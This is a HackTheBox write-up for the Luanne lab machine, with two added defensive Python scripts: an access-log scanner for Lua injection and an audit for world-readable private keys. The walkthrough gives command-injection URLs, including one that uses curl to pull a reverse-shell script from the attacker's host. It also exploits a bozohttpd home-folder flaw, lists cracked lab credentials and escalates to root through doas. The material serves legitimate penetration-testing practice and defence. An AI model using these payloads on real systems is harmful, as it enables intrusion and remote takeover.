Luanne Box Writeup Walkthrough Htb Hackthebox – [HTB] – HackTheBox

This article shows how to hack the Luanne box and obtain both user.txt and root.txt.

Luanne is a machine on HackTheBox.

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.


First, I used nmap to scan for open ports. As shown below, ports 22, 80, and 9001 are open.

[Screenshot: Ports Scan]

Then, navigate to the following URL. Observe that it reveals an endpoint.

http://10.129.121.38/robots.txt

[Screenshot: Valid Endpoint]

The city parameter of that endpoint is vulnerable to command injection. I can execute an OS command simply by navigating to the following URL.

http://10.129.121.38/weather/forecast?city=a') os.execute('OS_Command')--

For example:

http://10.129.121.38/weather/forecast?city=a') os.execute('id')--

[Screenshot: Endpoint RCE]
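As an added, defender-side example that is not part of the original post: the injection shape above (a quote and parenthesis that close the string literal, followed by os.execute, followed by a Lua comment marker) can be caught at two points, an allowlist check on the city parameter inside the handler, and a signature scan over the web server's access logs. The access-log lines, the allowlist policy (letters, spaces and hyphens only) and the function names are all assumptions made up for this illustration; the real fix is to stop building Lua source from request input, with the allowlist as an extra layer.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines in the common log format (not taken
# from the original post). Lines 2 and 3 carry the same kind of query string
# as the injected URLs shown in the writeup; lines 1 and 4 are benign.
SAMPLE_LOG = """\
10.10.17.26 - - [16/Sep/2020:10:00:01 +0000] "GET /weather/forecast?city=London HTTP/1.1" 200 512
10.10.17.26 - - [16/Sep/2020:10:00:05 +0000] "GET /weather/forecast?city=a')%20os.execute('id')-- HTTP/1.1" 500 0
10.10.17.26 - - [16/Sep/2020:10:00:09 +0000] "GET /weather/forecast?city=a%27)%20os.execute(%27find+/+-name+%22*python3.7*%22%27)-- HTTP/1.1" 500 0
10.10.17.26 - - [16/Sep/2020:10:00:12 +0000] "GET /robots.txt HTTP/1.1" 200 60
"""

# Request line inside a common-log-format record: "<METHOD> <target> HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Assumed allowlist policy for the city parameter: letters, spaces and hyphens
# only, at most 64 characters. Quotes, parentheses and "--" can never pass.
CITY_RE = re.compile(r"[A-Za-z][A-Za-z -]{0,63}")

# Markers of Lua code being smuggled into a string literal: closing a quoted
# string, or calling the Lua functions that run OS commands or evaluate code.
LUA_INJECTION_RE = re.compile(
    r"""['"]\s*\)|\bos\.execute\b|\bio\.popen\b|\bload(string)?\s*\(""", re.I
)


def extract_city(target: str):
    """Return the percent-decoded city parameter of a request target, or None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    values = query.get("city")
    return values[0] if values else None


def is_valid_city(value) -> bool:
    """Allowlist check the handler should apply before using the value at all."""
    return value is not None and CITY_RE.fullmatch(value) is not None


def looks_like_lua_injection(value) -> bool:
    """Signature check for the injection shape used against this endpoint."""
    return value is not None and LUA_INJECTION_RE.search(value) is not None


def scan_access_log(text: str):
    """Return (line_number, decoded_city) for every request whose city
    parameter fails the allowlist or matches the injection signature."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        city = extract_city(match.group("target"))
        if city is None:
            continue  # request without a city parameter
        if not is_valid_city(city) or looks_like_lua_injection(city):
            hits.append((lineno, city))
    return hits


if __name__ == "__main__":
    for lineno, city in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: suspicious city parameter {city!r}")
```

The scanner decodes the query string before matching, which matters because the writeup's later payloads arrive with the quotes percent-encoded (%27); a signature applied to the raw request line would miss them.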

Because the OS is not a standard Linux system, only a limited set of commands is available. I then located the python binary using the find command.

http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27find+/+-name+"*python3.7*"%27)--

[Screenshot: Find Python Path]

Then, I created a Python reverse shell and hosted an HTTP server locally to serve it.

[Screenshot: Create a Python Reverse Shell]

Download the reverse shell to the /tmp folder by navigating to the following URL:

http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27curl+http://10.10.17.26/1.py+-o+/tmp/1.py%27)--

Finally, I gained a reverse shell by navigating to the following URL.

http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27/usr/pkg/bin/python3.7+/tmp/1.py%27)--

[Screenshot: Gain Reverse Shell]

Execute the following command to list the listening ports. Observe that port 3001 is open locally.

netstat -an

[Screenshot: Check Local Open Ports]

There is also a .htpasswd file.

[Screenshot: htpasswd File]

After cracking the .htpasswd file, I gained the following credential:

Credential

Username: webapi_user

Password: iamthebest

Execute the following command to visit the website hosted on port 3001:

Observe that the server is running bozohttpd, as shown in the screenshot below:

[Screenshot: htpasswd File]

According to this article, there are several vulnerabilities in this application (CVE-2010-2320, CVE-2010-2195). Attackers are able to access a user’s home folder by providing a “~” in the path.

I attempted to access r.michaels’s home folder by executing the following command.

curl -v --user webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/

Observe that the access was successful, as shown in the screenshot below:

[Screenshot: Bozohttpd Vulnerability]

Download the id_rsa file, and then log in as the r.michaels user.

I then obtained the user.txt file.

[Screenshot: Luanne User.txt]
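The foothold above came from a private key that a per-user web root made downloadable. As an added example from the hardening side, and not code from the original post, here is a small audit that walks a home-directory tree and reports private-key files readable by group or others, which is the condition that turns a “~user” directory listing into a credential leak. The demo tree it builds (users alice and bob, a public_html directory, the key file names) is constructed for the illustration; on a real host you would point it at the actual home root.

```python
import os
import stat
import tempfile

# File names that conventionally hold private keys.
PRIVATE_KEY_NAMES = {"id_rsa", "id_dsa", "id_ecdsa", "id_ed25519"}


def is_private_key_name(name: str) -> bool:
    return name in PRIVATE_KEY_NAMES or name.endswith(".pem")


def exposed_private_keys(home_root: str):
    """Walk every home directory below home_root and return
    (relative_path, mode) for private-key files readable by group or others.
    A key like that inside a per-user web root (for example ~user/public_html)
    is downloadable by anyone who can reach the web server."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(home_root):
        for name in filenames:
            if not is_private_key_name(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks and special files
            if st.st_mode & (stat.S_IRGRP | stat.S_IROTH):
                findings.append(
                    (os.path.relpath(path, home_root), stat.S_IMODE(st.st_mode))
                )
    return sorted(findings)


def build_demo_home_tree() -> str:
    """Create a constructed home-directory tree for the demonstration:
    alice keeps her key at mode 0600, bob's copy sits in public_html at 0644."""
    root = tempfile.mkdtemp(prefix="homes_demo_")
    layout = {
        os.path.join("alice", ".ssh", "id_rsa"): 0o600,
        os.path.join("bob", "public_html", "id_rsa"): 0o644,
        os.path.join("bob", "public_html", "index.html"): 0o644,
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("PLACEHOLDER, not a real key\n")  # constructed content
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    root = build_demo_home_tree()
    for rel, mode in exposed_private_keys(root):
        print(f"{rel}: mode {mode:04o} is readable by others; expected 0600")
```

Only bob’s copy under public_html is reported; alice’s key at mode 0600 passes. Fixing a finding means tightening the mode and moving the key out of any directory the web server serves.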

After enumeration, I obtained a backup file: /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc

I attempted to decrypt it with OpenSSL, but that did not work. Then, I used the following command to decrypt it:

netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/1.tar.gz

Observe that it decrypted successfully, as shown in the screenshot below:

[Screenshot: Netpgp Decrypt]

Then, I identified another .htpasswd file in the tar archive.

[Screenshot: Another htpasswd File]

After cracking the hash, I obtained another credential:

Credential

Username: webapi_user

Password: littlebear

Check the doas configuration and observe that the current user is allowed to run commands as root.

cat /usr/pkg/etc/doas.conf

Then, using the above credential, execute the following command to switch to the root user.

doas -u root /bin/sh

[Screenshot: Obtain Root.txt]